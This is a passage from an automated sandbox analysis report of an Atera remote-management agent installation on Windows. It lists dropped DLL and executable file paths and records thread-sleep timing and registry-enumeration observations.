                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.ServicePoint.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Handles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorrc.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeDropped PE file which has not been started: C:\Windows\Temp\SplashtopStreamer.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordaccore_amd64_amd64_6.0.3224.31407.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.HttpListener.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.DataAnnotations.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIAC5.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA259.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscorlib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.Numerics.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.Emit.Lightweight.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clretwrc.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\clrjit.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Private.DataContractSerialization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9B15.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\mscordbi.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIBEDF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI72FF.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.Windows.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Resources.Writer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Globalization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.Compression.Native.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.CodePages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Reflection.TypeExtensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeRegistry key enumerated: More than 126 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 7848Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6456Thread sleep time: -60000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 8172Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 3800Thread sleep count: 5693 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 3800Thread sleep count: 3805 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep count: 31 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -28592453314249787s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6536Thread sleep count: 50 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6536Thread sleep time: -500000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7540Thread sleep time: -7378697629483816s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 6976Thread sleep time: -180000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -43125s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -43016s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42907s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42781s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42640s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42515s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42360s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -42003s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -41584s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -41426s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -41202s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -41094s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40984s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40870s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40762s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40625s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40509s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40383s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40281s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40172s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -40063s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39953s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39844s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39735s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39625s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39508s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 7704Thread sleep time: -39375s >= -30000s
                                Source: C:\Windows\SysWOW64\rundll32.exe TID: 7496Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8008Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 8012Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 5980Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4016Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1516Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 3256Thread sleep count: 7649 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 3256Thread sleep count: 1911 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4236Thread sleep count: 41 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4236Thread sleep time: -37815825351104557s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4580Thread sleep time: -180000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 1832Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe TID: 4484Thread sleep time: -180000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6676Thread sleep count: 5379 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 6676Thread sleep count: 1873 > 30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -21213755684765971s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599890s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599780s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599672s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599561s >= -30000s
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 4324Thread sleep time: -599453s >= -30000s
